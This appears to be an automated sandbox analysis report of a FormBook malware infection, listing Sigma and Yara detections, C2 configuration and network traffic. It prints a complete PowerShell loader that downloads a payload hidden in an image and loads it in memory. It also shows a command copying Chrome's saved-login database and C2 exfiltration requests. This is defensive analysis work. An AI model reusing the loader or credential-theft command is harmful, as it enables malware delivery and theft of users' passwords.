            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgT

            Data Obfuscation

            barindex
            Sigma detected: Powershell download and load assembly
            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('wBUgp6qysF58iJA!=yekhtua&21112%08168C3C4F36F6E4=diser?daolnwod/moc.evil.evirdeno//:sptth' , 'desativado' , 'desativado' , 'desativado','MSBuild',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('wBUgp6qysF58iJA!=yekhtua&21112%08168C3C4F36F6E4=d

            Stealing of Sensitive Information

            barindex
            Sigma detected: Steal Google chrome login data
            Source: Process startedAuthor: Joe Security: Data: Command: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V, CommandLine: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\colorcpl.exe", ParentImage: C:\Windows\SysWOW64\colorcpl.exe, ParentProcessId: 4584, ParentProcessName: colorcpl.exe, ProcessCommandLine: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V, ProcessId: 1704, ProcessName: cmd.exe

            Snort Signatures

            No Snort rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
            Found malware configuration
            Source: 00000008.00000002.2931877788.0000000003550000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.lunazone.us/m07a/"], "decoy": ["shakishaskakes.com", "com222.shop", "thailand-package.in", "apexu.xyz", "xlmagnemite.com", "nagapura.com", "auralights.store", "springupfashionsalon.com", "ecoessentiaer.shop", "myorra.com", "xasvcd.xyz", "zachbynesdesigns.art", "qdaoxingsujiao.com", "workproapi.site", "pbmengineering.com", "cioccasubaruspecials.com", "tmotest.com", "yipaijihejiaoyu.com", "msaway.com", "jfn3d.cc", "potentpolitics.com", "gumuszemin.com", "elimmedcentre.com", "tveuropetravel.com", "cryptoshipping-cargo.site", "123b.bingo", "auspilifepharma.com", "nacob.top", "cnexam.net", "royal-buttons.com", "stanleywarner.autos", "s1mple-giveaways.com", "cairns.care", "slimshakeshop.online", "speakgeni.us", "qnttlw.com", "kitty-fit.com", "recordlabeltime.com", "balancceer.top", "cerkust.info", "cursosead.pro", "ukrfilmtrest.com", "rewardraptor.net", "welqi.com", "chronotypecolab.com", "loj-wroie.com", "lauracecilia.com", "luminouscar.info", "theschoolofbooks.shop", "manjuc.xyz", "successchasersltd.com", "matchuplover.com", "proomtb.com", "rankrise.shop", "theiceden.co", "adeptetho.com", "myshup.net", "bet7839.com", "propertiesfinance.com", "izii.online", "herb.boutique", "nobook.xyz", "yucampos.co", "liabillityinsurance.com"]}
            Yara detected FormBook
            Source: Yara matchFile source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.2931877788.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2931912709.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2931044942.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: unknownHTTPS traffic detected: 172.67.187.200:443 -> 192.168.2.4:49730 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.45.138:443 -> 192.168.2.4:49731 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.4:49733 version: TLS 1.2
            Source: Binary string: firefox.pdbP source: colorcpl.exe, 00000008.00000003.2007973270.00000000069B5000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000003.2058701262.0000000006A65000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: colorcpl.pdbGCTL source: MSBuild.exe, 00000005.00000002.1874447638.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1873865542.0000000000ED0000.00000040.10000000.00040000.00000000.sdmp, colorcpl.exe, 00000008.00000002.2930841822.00000000000E0000.00000040.80000000.00040000.00000000.sdmp
            Source: Binary string: colorcpl.pdb source: MSBuild.exe, 00000005.00000002.1874447638.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1873865542.0000000000ED0000.00000040.10000000.00040000.00000000.sdmp, colorcpl.exe, colorcpl.exe, 00000008.00000002.2930841822.00000000000E0000.00000040.80000000.00040000.00000000.sdmp
            Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: colorcpl.exe, 00000008.00000002.2931288836.00000000032EF000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: MSBuild.exe, 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000003.1873152965.0000000004D8D000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000003.1875146322.0000000004F39000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000002.2932383169.00000000050E0000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000002.2932383169.000000000527E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: MSBuild.exe, MSBuild.exe, 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, colorcpl.exe, 00000008.00000003.1873152965.0000000004D8D000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000003.1875146322.0000000004F39000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000002.2932383169.00000000050E0000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000002.2932383169.000000000527E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: firefox.pdb source: colorcpl.exe, 00000008.00000003.2007973270.00000000069B5000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000003.2058701262.0000000006A65000.00000004.00000020.00020000.00000000.sdmp

            Software Vulnerabilities

            barindex
            Suspicious execution chain found
            Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then pop edi5_2_00416C60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then pop edi5_2_00416CCF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then pop edi5_2_00417DA5
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 4x nop then pop edi8_2_02F46CD4
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 4x nop then pop edi8_2_02F47DA5

            Networking

            barindex
            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\System32\wscript.exeNetwork Connect: 172.67.187.200 443Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 203.161.57.217 80Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 217.160.0.95 80Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 3.33.130.190 80Jump to behavior
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: www.lunazone.us/m07a/
            Connects to a pastebin service (likely for C&C)
            Source: unknownDNS query: name: paste.ee
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.xasvcd.xyz
            Source: global trafficHTTP traffic detected: GET /images/004/771/542/original/new_image.jpg?1713394820 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /images/004/771/542/original/new_image.jpg?1713394820 HTTP/1.1Host: uploaddeimagens.com.br
            Source: global trafficHTTP traffic detected: GET /download?resid=4E6F63F4C3C86180%21112&authkey=!AJi85Fsyq6pgUBw HTTP/1.1Host: onedrive.live.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /m07a/?r0=FhT5TC53u3Z5TMdVNb/kS0zfz8OkKD2EUSj1eX+RC4J/yfdC5W2U1xrbN9PF9xQNo6z4&CN6=8pHxU0H HTTP/1.1Host: www.msaway.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /m07a/?r0=kbHmn/9MInRG3rqwWMOzjv0FEYEHMcqozMEbxoNxlifqHhdD1tGr+ls2dZBuYaiV3Vua&CN6=8pHxU0H HTTP/1.1Host: www.lunazone.usConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: Joe Sandbox ViewIP Address: 172.67.187.200 172.67.187.200
            Source: Joe Sandbox ViewIP Address: 172.67.187.200 172.67.187.200
            Source: Joe Sandbox ViewIP Address: 13.107.139.11 13.107.139.11
            Source: Joe Sandbox ViewIP Address: 104.21.45.138 104.21.45.138
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVNPTCorpVN VNPT-AS-VNVNPTCorpVN
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Windows\explorer.exeCode function: 6_2_0B411F82 getaddrinfo,SleepEx,setsockopt,recv,6_2_0B411F82
            Source: global trafficHTTP traffic detected: GET /d/K2No9 HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: paste.eeConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /images/004/771/542/original/new_image.jpg?1713394820 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /images/004/771/542/original/new_image.jpg?1713394820 HTTP/1.1Host: uploaddeimagens.com.br
            Source: global trafficHTTP traffic detected: GET /download?resid=4E6F63F4C3C86180%21112&authkey=!AJi85Fsyq6pgUBw HTTP/1.1Host: onedrive.live.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /m07a/?r0=FhT5TC53u3Z5TMdVNb/kS0zfz8OkKD2EUSj1eX+RC4J/yfdC5W2U1xrbN9PF9xQNo6z4&CN6=8pHxU0H HTTP/1.1Host: www.msaway.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /m07a/?r0=kbHmn/9MInRG3rqwWMOzjv0FEYEHMcqozMEbxoNxlifqHhdD1tGr+ls2dZBuYaiV3Vua&CN6=8pHxU0H HTTP/1.1Host: www.lunazone.usConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: unknownDNS traffic detected: queries for: paste.ee
            Source: unknownHTTP traffic detected: POST /m07a/ HTTP/1.1Host: www.msaway.comConnection: closeContent-Length: 175500Cache-Control: no-cacheOrigin: http://www.msaway.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.msaway.com/m07a/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 72 30 3d 4e 44 66 44 4e 6c 4a 5a 33 57 68 74 45 73 31 55 63 4c 69 51 54 79 4c 46 77 76 75 4f 48 78 75 6b 47 55 4f 6b 45 45 36 4b 47 71 42 4a 33 76 38 59 39 55 72 65 36 6e 75 35 66 2d 33 67 34 77 49 5a 71 59 33 78 79 4c 4b 41 72 76 47 50 43 33 70 68 47 39 31 70 33 37 75 58 4c 4c 53 4c 4a 61 4b 79 42 77 56 52 6b 68 74 30 68 6a 31 63 52 62 4d 63 51 65 37 71 62 68 33 44 4b 36 4a 38 6f 4a 4b 65 4f 30 74 78 49 68 61 78 73 56 78 75 68 56 71 51 7e 48 77 64 75 6d 7a 4e 6f 44 30 73 6d 57 5a 43 61 62 48 79 28 53 6a 31 53 76 33 47 68 6a 78 6e 7e 33 58 47 66 58 74 7a 4c 69 71 4e 61 38 62 4f 72 76 45 67 36 41 31 78 47 73 73 4b 74 43 52 42 64 6a 6c 65 4d 6a 50 6e 66 4f 38 31 6f 74 61 70 6a 67 4d 59 4f 71 69 62 6b 4e 47 36 47 45 78 46 76 54 4e 63 58 50 33 55 59 30 74 4b 68 6d 72 42 28 6e 67 4e 79 77 42 58 48 74 44 39 6b 57 4c 64 70 61 59 58 6f 6b 31 34 72 5f 54 33 54 62 63 37 4d 64 4e 67 55 59 66 7a 6c 66 34 67 39 76 47 50 33 34 47 57 6b 71 42 5f 69 31 47 43 63 69 35 36 62 5a 71 37 38 54 43 74 6b 36 6f 65 66 51 4f 63 54 30 41 78 49 5f 4d 53 79 31 28 45 4e 73 53 39 4e 6f 6c 55 50 34 53 73 55 30 6d 4c 32 6b 28 68 70 72 62 4c 28 65 28 34 7a 6b 45 6c 41 45 6a 6b 32 71 44 4e 6a 75 39 42 75 2d 74 65 30 42 6b 50 6c 4b 5a 74 4d 6d 78 66 6c 39 76 48 52 54 32 68 77 52 53 63 46 6f 6a 32 76 54 48 37 65 68 78 34 58 71 57 43 59 6c 46 79 72 76 33 6d 33 58 73 39 54 70 73 51 71 50 71 56 76 55 5a 4a 4a 61 6a 47 30 53 77 58 58 55 4f 47 52 36 6f 4a 38 33 42 30 57 39 30 4c 76 73 6f 50 41 4a 6c 45 35 75 4c 4d 6c 75 55 57 71 4c 77 6c 58 77 5a 6a 45 6c 5a 57 39 6f 62 59 59 2d 72 70 63 31 53 2d 28 5f 55 39 4f 66 73 66 74 45 36 37 46 5a 7e 34 64 33 34 61 35 33 4d 51 55 39 4b 45 57 4f 67 7a 77 79 56 4b 77 4c 73 53 32 62 59 68 69 67 63 70 77 5a 4d 34 79 6e 36 59 49 54 78 38 73 42 70 4e 7e 41 78 53 77 76 33 64 51 67 62 6e 6d 76 4a 70 41 42 4d 30 58 7a 76 79 62 65 70 53 5a 47 7e 67 50 36 55 6d 54 4d 52 56 70 4b 49 30 46 69 54 52 51 50 33 33 51 48 74 75 67 42 36 44 42 62 31 30 6c 76 68 65 31 56 66 4d 47 64 56 4c 6a 45 52 2d 6b 75 71 69 55 43 4a 62 34 52 38 32 74 32 63 6a 28 45 39 59 4c 4b 6e 5a 32 41 43 34 66 39 51 38 67 78 52 47 52 37 77 62 31 35 39 5a 50 62 77 72 38 49 46 45 49 2d 6f 4d 63 78 67 58 32 38 79 33 5a 4a 68 50 69 53 50 30 66 64 63 69 47 5f 68 45 41 4a 6b 5a 37 4b 62 6c 42 50 68 48 53 4b 47 51 4e 46 6f 48 31 76 43 74 33 32 6b 64 32 38 28 38 43 68 64 72 74 6c 34 6a 49 74 6a 39 67 4c 51 30 66 69 72 55 4f 5a 4b 47 48 4e 4c 5f 6d 6f 30 31 76 67 4b 38 52 79 34 69 52 76 74 72 39 74 46 71 52 70 77 38 76 77 6f 53 35 70 4d 5a 62 63 45 67 37 68 56 79 44 6f 49 6c 34 53 38 46 6f 74 63 59 78 74 30 39 6b
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 596Connection: closeDate: Thu, 18 Apr 2024 19:12:11 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 21 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 52 52 4f 52 20 34 30 34 3a 20 41 52 43 48 49 56 4f 20 4e 4f 20 45 4e 43 4f 4e 54 52 41 44 4f 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 45 6c 20 64 6f 63 75 6d 65 6e 74 6f 20 73 6f 6c 69 63 69 74 61 64 6f 20 6e 6f 20 68 61 20 73 69 64 6f 20 65 6e 63 6f 6e 74 72 61 64 6f 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404! </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> ERROR 404: ARCHIVO NO ENCONTRADO </h1> <p style="font-size:0.8em;"> El documento solicitado no ha sido encontrado. </p> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Thu, 18 Apr 2024 19:12:14 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 6d 91 4d 4f c3 30 0c 86 ef fc 0a 13 ce 6d 56 c6 61 eb da 49 a3 ab 04 12 ac a8 2a 5f c7 d0 66 34 52 9a 94 d4 63 1b bf 9e 24 e3 5b 9c e2 38 af 9f d7 76 92 e3 65 91 55 8f 37 39 b4 d8 49 b8 b9 3d bf ba cc 80 04 94 de 8f 33 4a 97 d5 12 1e 2e aa eb 2b 88 c2 11 54 86 a9 41 a0 d0 8a 49 4a f3 15 39 22 2d 62 1f 53 ba dd 6e c3 ed 38 d4 e6 99 56 25 dd 39 56 e4 8a 3f c2 00 7f 54 86 0d 36 64 7e 94 78 43 c9 d4 73 4a b8 22 b0 eb 64 fc eb a6 86 f4 1f 7c 34 9d 4e 0f 54 cb 80 a4 e5 ac b1 27 24 28 50 72 17 41 6e 8c 36 70 36 3a 3b 76 79 fa f5 90 74 1c 19 d4 5a 21 57 98 12 e4 3b a4 ae 87 19 d4 2d 33 03 c7 74 83 eb 60 42 ec 26 b0 0f f8 cb 46 bc a6 24 3b c8 83 6a df 73 67 08 7f 28 4a 07 35 ab 5b fe bb ca a7 02 67 65 b4 f4 7d d2 8f 46 93 27 dd ec 61 c0 bd e4 29 59 5b 41 b0 66 9d 90 fb 98 19 c1 e4 ec 60 d1 46 9f 8a 5a 4b 6d e2 93 11 1b 9f 4e ea 99 d7 0f e2 8d c7 f6 37 78 77 50 43 5e 96 45 e9 e6 8d 61 51 66 17 97 77 05 ac 0a c8 57 59 b1 aa ca c5 b2 f0 5b 68 23 df 7c ff 09 fe 46 8d c2 c9 37 4a 42 a3 eb 4d 67 17 a4 61 